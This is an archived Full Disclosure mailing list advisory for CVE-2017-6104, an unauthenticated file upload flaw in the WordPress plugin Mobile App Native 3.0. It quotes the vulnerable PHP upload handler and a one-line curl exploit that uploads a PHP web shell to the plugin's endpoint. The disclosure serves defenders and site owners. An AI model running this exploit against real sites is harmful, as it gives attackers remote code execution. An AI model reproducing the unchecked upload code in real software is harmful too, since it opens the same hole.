Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

From: "Larry W. Cashdollar" <larry0 () me com>
Date: Thu, 02 Mar 2017 06:29:40 -0500
Title: Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
Vulnerability Date: 2017-02-27
Download: https://wordpress.org/plugins/zen-mobile-app-native/
Vendor: https://profiles.wordpress.org/zendkmobileapp/
Notified: 2017-02-27
Description: Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes 
using Mobile App Builder.
Vulnerability: The code in file ./zen-mobile-app-native/server/images.php doesn't require authentication or check that 
the user is allowed to upload content.
It also doesn't sanitize the file upload against executable code.

<?php
//header('content-type: text/html; charset=iso-8859-2');
header('Content-Type: text/html; charset=utf-8');
header('Access-Control-Allow-Origin: *');
require_once('function.php');

        if ($_FILES['file']['name']) {
            if (!$_FILES['file']['error']) {
                $name = md5(rand(100, 200));
                $ext = explode('.', $_FILES['file']['name']);
                $filename = $name . '.' . $ext[1];
                $destination = 'images/' . $filename;
                $location = $_FILES["file"]["tmp_name"];
                move_uploaded_file($location, $destination);
                echo $plugin_url.'/server/images/' . $filename;
            }
            else {
              echo  $message = 'Ooops!  Your upload triggered the following error:  '.$_FILES['file']['error'];
            }
    }
CVEIDs: CVE-2017-6104
Exploit: 
$ curl   -F "file=@/var/www/shell.php" 
"http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native/server/images.php";
http://example.com/wordpress/wp-content/plugins/zen-mobile-app-native//server/images/8d5e957f297893487bd98fa830fa6413.php

https://github.com/lcashdol/Exploits/blob/master/mobile_plugin_exploit.sh

URL: http://www.vapidlabs.com/advisory.php?v=178
Credit: Larry W. Cashdollar, @_larry0

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: